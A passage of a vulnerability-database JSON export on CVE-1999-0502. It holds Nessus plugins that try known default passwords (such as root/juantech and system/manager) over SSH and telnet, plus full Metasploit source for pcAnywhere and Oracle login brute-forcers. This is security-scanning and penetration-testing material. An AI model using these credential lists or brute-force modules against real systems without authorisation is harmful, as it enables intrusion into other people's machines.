script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-09-14T13:10:07", "description": "The account 'swift' has the password 'swift'. An attacker may use\nthis to gain further privileges on this system.", "edition": 19, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2004-03-24T00:00:00", "title": "Default Password (swift) for 'swift' Account", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-1999-0502"], "modified": "2020-09-02T00:00:00", "cpe": [], "id": "ACCOUNT_SWIFT_SWIFT.NASL", "href": "https://www.tenable.com/plugins/nessus/12116", "sourceData": "#\n# This script was shamelessly copied by Michel Arboi :)\n#\n# GNU Public License\n#\n\naccount = \"swift\";\npassword = \"swift\";\n\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(12116);\n script_version (\"$Revision: 1.21 $\");\n script_cvs_date(\"$Date: 2017/11/20 15:13:56 $\");\n\n script_cve_id(\"CVE-1999-0502\");\n \n script_name(english:\"Default Password (swift) for 'swift' Account\");\n script_summary(english:\"Attempts to log in to the remote host.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has an account with a default password.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'swift' has the password 'swift'. An attacker may use\nthis to gain further privileges on this system.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Set a password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/03/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n \n script_copyright(english:\"This script is Copyright (C) 2004-2017 Tenable Network Security, Inc.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n\n exit(0);\n}\n\n#\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-09-14T13:10:07", "description": "The account 'system' has the password 'manager'. An attacker may use\nthis to gain further privileges on this system.", "edition": 19, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2003-02-20T00:00:00", "title": "Default Password (manager) for 'system' Account", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-1999-0502"], "modified": "2020-09-02T00:00:00", "cpe": [], "id": "ACCOUNT_SYSTEM_MANAGER.NASL", "href": "https://www.tenable.com/plugins/nessus/11257", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"system\";\npassword = \"manager\";\n\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(11257);\n script_version (\"$Revision: 1.24 $\");\n script_cvs_date(\"$Date: 2017/11/20 15:13:56 $\");\n\n script_cve_id(\"CVE-1999-0502\");\n \n script_name(english:\"Default Password (manager) for 'system' Account\");\n script_summary(english:\"Attempts to log in to the remote host.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has an account with a default password.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'system' has the password 'manager'. An attacker may use\nthis to gain further privileges on this system.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Set a password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2003/02/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_end_attributes();\n\t\t \n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n \n script_copyright(english:\"This script is Copyright (C) 2003-2017 Tenable Network Security, Inc.\");\n \n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n\n exit(0);\n}\n\n#\n# The script code starts here : \n#\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-09-14T13:10:07", "description": "The account 'root' on the remote host has the default password\n'juantech'. A remote attacker can exploit this issue to gain\nadministrative access to the affected system.", "edition": 22, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-10-28T00:00:00", "title": "Default Password 'juantech' for 'root' Account", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-1999-0502"], "modified": "2020-09-02T00:00:00", "cpe": [], "id": "ACCOUNT_ROOT_JUANTECH.NASL", "href": "https://www.tenable.com/plugins/nessus/94391", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"root\";\npassword = \"juantech\";\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(94391);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2019/11/14\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password 'juantech' for 'root' Account\");\n script_summary(english:\"Attempts to log into the remote host.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An administrative account on the remote host uses a known default\npassword.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'root' on the remote host has the default password\n'juantech'. A remote attacker can exploit this issue to gain\nadministrative access to the affected system.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Change the password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-1999-0502\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-09-14T13:10:06", "description": "The account 'root' on the remote host has the password '0p3nm35h'. \nAn attacker may leverage this issue to gain total control of the\naffected system.\n\nNote that some network devices are known to use these credentials by\ndefault.", "edition": 20, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2010-08-09T00:00:00", "title": "Default Password (0p3nm35h) for 'root' Account", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-1999-0502"], "modified": "2020-09-02T00:00:00", "cpe": [], "id": "ACCOUNT_ROOT_0P3NM35H.NASL", "href": "https://www.tenable.com/plugins/nessus/48274", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"root\";\npassword = \"0p3nm35h\";\n\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(48274);\n script_version (\"$Revision: 1.11 $\");\n script_cvs_date(\"$Date: 2017/11/20 15:13:56 $\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password (0p3nm35h) for 'root' Account\");\n script_summary(english:\"Attempts to log in to the remote host.\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"An account on the remote host uses a known password.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'root' on the remote host has the password '0p3nm35h'. \nAn attacker may leverage this issue to gain total control of the\naffected system.\n\nNote that some network devices are known to use these credentials by\ndefault.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Set a strong password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n # https://web.archive.org/web/20101029225701/http://robin-mesh.wik.is/Howto/Router_Access/SSH_Access\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?6d0967a9\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/08/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2017 Tenable Network Security, Inc.\");\n script_dependencie(\"ssh_detect.nasl\", \"account_check.nasl\", \"telnetserver_detect_type_nd_version.nasl\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n\n exit(0);\n}\n\n#\n# The script code starts here : \n#\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2020-04-11T23:42:59", "description": "This module will test pcAnywhere logins on a range of machines and report successful logins.\n", "published": "2012-05-31T19:46:26", "type": "metasploit", "title": "PcAnywhere Login Scanner", "bulletinFamily": "exploit", "cvelist": ["CVE-1999-0502"], "modified": "2017-07-24T13:26:21", "id": "MSF:AUXILIARY/SCANNER/PCANYWHERE/PCANYWHERE_LOGIN", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/exploit/tcp'\n\nclass MetasploitModule < Msf::Auxiliary\n include Exploit::Remote::Tcp\n include Msf::Auxiliary::Scanner\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::AuthBrute\n\n\n def initialize\n super(\n 'Name' => 'PcAnywhere Login Scanner',\n 'Description' => %q{\n This module will test pcAnywhere logins on a range of machines and\n report successful logins.\n },\n 'Author' => ['theLightCosine'],\n 'References' =>\n [\n [ 'CVE', '1999-0502'] # Weak password\n ],\n 'License' => MSF_LICENSE\n )\n\n register_options([Opt::RPORT(5631)])\n\n end\n\n def run_host(ip)\n connect\n hsr = pca_handshake(ip)\n return if hsr == :handshake_failed\n\n each_user_pass do |user, pass|\n next if user.blank? or pass.blank?\n print_status(\"Trying #{user}:#{pass}\")\n result = do_login(user, pass)\n case result\n when :success\n print_good(\"#{ip}:#{rport} Login Successful #{user}:#{pass}\")\n report_cred(\n ip: rhost,\n port: datastore['RPORT'],\n service_name: 'pcanywhere',\n user: user,\n password: pass\n )\n return if datastore['STOP_ON_SUCCESS']\n print_status('Waiting to Re-Negotiate Connection (this may take a minute)...')\n select(nil, nil, nil, 40)\n connect\n hsr = pca_handshake(ip)\n return if hsr == :handshake_failed\n when :fail\n print_status(\"#{ip}:#{rport} Login Failure #{user}:#{pass}\")\n when :reset\n print_status(\"#{ip}:#{rport} Login Failure #{user}:#{pass}\")\n print_status('Connection reset attempting to reconnect in 1 second')\n select(nil, nil, nil, 1)\n connect\n hsr = pca_handshake(ip)\n return if hsr == :handshake_failed\n end\n end\n\n end\n\n def report_cred(opts)\n service_data = {\n address: opts[:ip],\n port: opts[:port],\n service_name: opts[:service_name],\n protocol: 'tcp',\n workspace_id: myworkspace_id\n }\n\n credential_data = {\n origin_type: :service,\n module_fullname: fullname,\n username: opts[:user],\n private_data: opts[:password],\n private_type: :password\n }.merge(service_data)\n\n login_data = {\n core: create_credential(credential_data),\n last_attempted_at: DateTime.now,\n status: Metasploit::Model::Login::Status::SUCCESSFUL\n }.merge(service_data)\n\n create_credential_login(login_data)\n end\n\n def do_login(user, pass, nsock=self.sock)\n # Check if we are already at a logon prompt\n res = nsock.get_once(-1,5)\n euser = encryption_header(encrypt(user))\n nsock.put(euser)\n res = nsock.get_once(-1,5)\n\n # See if this knocked a login prompt loose\n if pca_at_login?(res)\n nsock.put(euser)\n res = nsock.get_once(-1,5)\n end\n\n # Check if we are now at the password prompt\n unless res and res.include? 'Enter password'\n print_error(\"Problem Sending Login: #{res.inspect}\")\n return :abort\n end\n\n epass = encryption_header(encrypt(pass))\n nsock.put(epass)\n res = nsock.get_once(-1,20)\n if res.include? 'Login unsuccessful'\n disconnect()\n return :reset\n elsif res.include? 'Invalid login'\n return :fail\n else\n disconnect()\n return :success\n end\n end\n\n def pca_handshake(ip, nsock=self.sock)\n print_status('Handshaking with the pcAnywhere service')\n nsock.put(\"\\x00\\x00\\x00\\x00\")\n res = nsock.get_once(-1,5)\n unless res and res.include? 'Please press <Enter>'\n print_error(\"Handshake(1) failed on Host #{ip} aborting. Error: #{res.inspect}\")\n return :handshake_failed\n end\n\n nsock.put(\"\\x6F\\x06\\xff\")\n res = nsock.get_once(-1,5)\n unless res and res.include? \"\\x78\\x02\\x1b\\x61\"\n print_error(\"Handshake(2) failed on Host #{ip} aborting. Error: #{res.inspect}\")\n return :handshake_failed\n end\n\n nsock.put(\"\\x6f\\x61\\x00\\x09\\x00\\xfe\\x00\\x00\\xff\\xff\\x00\\x00\\x00\\x00\")\n res = nsock.get_once(-1,5)\n unless res and res == \"\\x1b\\x62\\x00\\x02\\x00\\x00\\x00\"\n print_error(\"Handshake(3) failed on Host #{ip} aborting. Error: #{res.inspect}\")\n return :handshake_failed\n end\n\n nsock.put(\"\\x6f\\x62\\x01\\x02\\x00\\x00\\x00\")\n res = nsock.get_once(-1,5)\n unless res and res.include? \"\\x00\\x7D\\x08\"\n print_error(\"Handshake(4) failed on Host #{ip} aborting. Error: #{res.inspect}\")\n return :handshake_failed\n end\n\n res = nsock.get_once(-1,5) unless pca_at_login?(res)\n unless pca_at_login?(res)\n print_error(\"Handshake(5) failed on Host #{ip} aborting. Error: #{res.inspect}\")\n return :handshake_failed\n end\n end\n\n def pca_at_login?(res)\n return true if res and (res.include? 'Enter login name' or res.include? 'Enter user name' )\n return false\n end\n\n def encrypt(data)\n return '' if data.nil? or data.empty?\n return '' unless data.kind_of? String\n encrypted = ''\n encrypted << ( data.unpack('C')[0] ^ 0xab )\n data.bytes.each_with_index do |byte, idx|\n next if idx == 0\n encrypted << ( encrypted[(idx - 1),1].unpack('C')[0] ^ byte ^ (idx - 1) )\n end\n return encrypted\n end\n\n def encryption_header(data)\n header = [6,data.size].pack('CC')\n header << data\n return header\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/pcanywhere/pcanywhere_login.rb"}, {"lastseen": "2020-02-23T04:15:43", "description": "This module attempts to authenticate against an Oracle RDBMS instance using username and password combinations indicated by the USER_FILE, PASS_FILE, and USERPASS_FILE options. Due to a bug in nmap versions 6.50-7.80 may not work.\n", "published": "2011-03-14T22:13:57", "type": "metasploit", "title": "Oracle RDBMS Login Utility", "bulletinFamily": "exploit", "cvelist": ["CVE-1999-0502"], "modified": "2020-02-21T13:41:42", "id": "MSF:AUXILIARY/SCANNER/ORACLE/ORACLE_LOGIN", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Nmap\n include Msf::Auxiliary::AuthBrute\n include Msf::Auxiliary::Scanner\n\n # Creates an instance of this module.\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Oracle RDBMS Login Utility',\n 'Description' => %q{\n This module attempts to authenticate against an Oracle RDBMS\n instance using username and password combinations indicated\n by the USER_FILE, PASS_FILE, and USERPASS_FILE options.\n\n Due to a bug in nmap versions 6.50-7.80 may not work.\n },\n 'Author' => [\n 'Patrik Karlsson <patrik[at]cqure.net>', # the nmap NSE script, oracle-brute.nse\n 'todb' # this Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'URL', 'http://www.oracle.com/us/products/database/index.html' ],\n [ 'CVE', '1999-0502'], # Weak password CVE\n [ 'URL', 'http://nmap.org/nsedoc/scripts/oracle-brute.html']\n ]\n ))\n\n register_options(\n [\n OptPath.new('USERPASS_FILE', [ false, \"File containing (space-separated) users and passwords, one pair per line\",\n File.join(Msf::Config.data_directory, \"wordlists\", \"oracle_default_userpass.txt\") ]),\n OptString.new('SID', [ true, 'The instance (SID) to authenticate against', 'XE'])\n ])\n\n end\n\n def minimum_nmap_version\n \"5.50\"\n end\n\n def run\n unless nmap_version_at_least? minimum_nmap_version\n print_error \"Installed Nmap version is not at least #{minimum_nmap_version}. Exiting...\"\n return false\n end\n print_status \"Nmap: Setting up credential file...\"\n credfile = create_credfile\n cred_count = 0\n each_user_pass(true) {|user, pass| credfile[0].puts \"%s/%s\" % [user,pass]; cred_count += 1 }\n credfile[0].flush\n nmap_build_args(credfile[1])\n print_status \"Nmap: Starting Oracle bruteforce with #{cred_count} credentials against SID '#{sid}'...\"\n nmap_run\n credfile[0].unlink\n if Rex::Parser.nokogiri_loaded\n nmap_hosts {|type,data| process_nokogiri_callback(type,data)}\n else\n nmap_hosts {|host| process_host(host)}\n end\n end\n\n def sid\n datastore['SID'].to_s\n end\n\n def nmap_build_args(credpath)\n nmap_reset_args\n nmap_append_arg \"-P0\"\n nmap_append_arg \"--script oracle-brute\"\n script_args = [\n \"tns.sid=#{sid}\",\n \"brute.mode=creds\",\n \"brute.credfile=#{credpath}\",\n \"brute.threads=1\"\n ]\n script_args << \"brute.delay=#{set_brute_delay}\"\n nmap_append_arg \"--script-args \\\"#{script_args.join(\",\")}\\\"\"\n nmap_append_arg \"-n\"\n nmap_append_arg \"-v\" if datastore['VERBOSE']\n end\n\n # Sometimes with weak little 10g XE databases, you will exhaust\n # available processes from the pool with lots and lots of\n # auth attempts, so use bruteforce_speed to slow things down\n def set_brute_delay\n case datastore[\"BRUTEFORCE_SPEED\"]\n when 4; 0.25\n when 3; 0.5\n when 2; 1\n when 1; 15\n when 0; 60 * 5\n else; 0\n end\n end\n\n def create_credfile\n outfile = Rex::Quickfile.new(\"msf3-ora-creds-\")\n if Rex::Compat.is_cygwin and self.nmap_bin =~ /cygdrive/i\n outfile_path = Rex::Compat.cygwin_to_win32(outfile.path)\n else\n outfile_path = outfile.path\n end\n @credfile = [outfile,outfile_path]\n end\n\n def process_nokogiri_callback(type,data)\n return unless type == :port_script\n return unless data[\"id\"] == \"oracle-brute\"\n return unless data[:addresses].has_key? \"ipv4\"\n return unless data[:port][\"state\"] == ::Msf::ServiceState::Open\n addr = data[:addresses][\"ipv4\"].to_s\n port = data[:port][\"portid\"].to_i\n output = data[\"output\"]\n parse_script_output(addr,port,output)\n end\n\n def process_host(h)\n h[\"ports\"].each do |p|\n next if(h[\"scripts\"].nil? || h[\"scripts\"].empty?)\n h[\"scripts\"].each do |id,output|\n next unless id == \"oracle-brute\"\n parse_script_output(h[\"addr\"],p[\"portid\"],output)\n end\n end\n end\n\n def extract_creds(str)\n m = str.match(/\\s+([^\\s]+):([^\\s]+) =>/)\n m[1,2]\n end\n\n def report_cred(opts)\n service_data = {\n address: opts[:ip],\n port: opts[:port],\n service_name: opts[:service_name],\n protocol: 'tcp',\n workspace_id: myworkspace_id\n }\n\n credential_data = {\n origin_type: :service,\n module_fullname: fullname,\n username: opts[:user],\n private_data: opts[:password],\n private_type: :password\n }.merge(service_data)\n\n login_data = {\n core: create_credential(credential_data),\n status: opts[:status],\n proof: opts[:proof]\n }.merge(service_data)\n\n create_credential_login(login_data)\n end\n\n def parse_script_output(addr,port,output)\n msg = \"#{addr}:#{port} - Oracle -\"\n @oracle_reported = false\n if output =~ /TNS: The listener could not resolve \\x22/n\n print_error \"#{msg} Invalid SID: #{sid}\"\n elsif output =~ /Accounts[\\s]+No valid accounts found/nm\n print_status \"#{msg} No valid accounts found\"\n else\n output.each_line do |oline|\n if oline =~ /Login correct/\n if not @oracle_reported\n report_service(:host => addr, :port => port, :proto => \"tcp\", :name => \"oracle\")\n report_note(:host => addr, :port => port, :proto => \"tcp\", :type => \"oracle.sid\", :data => sid, :update => :unique_data)\n @oracle_reported = true\n end\n user,pass = extract_creds(oline)\n pass = \"\" if pass == \"<empty>\"\n print_good \"#{msg} Success: #{user}:#{pass} (SID: #{sid})\"\n report_cred(\n ip: addr,\n port: port,\n user: \"#{sid}/#{user}\",\n password: pass,\n service_name: 'tcp',\n status: Metasploit::Model::Login::Status::SUCCESSFUL\n )\n elsif oline =~ /Account locked/\n if not @oracle_reported\n report_service(:host => addr, :port => port, :proto => \"tcp\", :name => \"oracle\")\n report_note(:host => addr, :port => port, :proto => \"tcp\", :type => \"oracle.sid\", :data => sid, :update => :unique_data)\n @oracle_reported = true\n end\n user = extract_creds(oline)[0]\n print_good \"#{msg} Locked: #{user} (SID: #{sid}) -- account valid but locked\"\n report_cred(\n ip: addr,\n port: port,\n user: \"#{sid}/#{user}\",\n service_name: 'tcp',\n status: Metasploit::Model::Login::Status::DENIED_ACCESS\n )\n elsif oline =~ /^\\s+ERROR: (.*)/\n print_error \"#{msg} NSE script error: #{$1}\"\n end\n end\n end\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/oracle/oracle_login.rb"}, {"lastseen": "2019-12-17T15:44:35", "description": "This module attempts to authenticate against a DB2 instance using username and password combinations indicated by the USER_FILE, PASS_FILE, and USERPASS_FILE options.\n", "published": "2010-08-18T00:58:20", "type": "metasploit", "title": "DB2 Authentication Brute Force Utility", "bulletinFamily": "exploit", "cvelist": ["CVE-1999-0502"], "modified": "2019-10-03T16:45:09", "id": "MSF:AUXILIARY/SCANNER/DB2/DB2_AUTH", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'metasploit/framework/credential_collection'\nrequire 'metasploit/framework/login_scanner/db2'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::DB2\n include Msf::Auxiliary::AuthBrute\n include Msf::Auxiliary::Scanner\n include 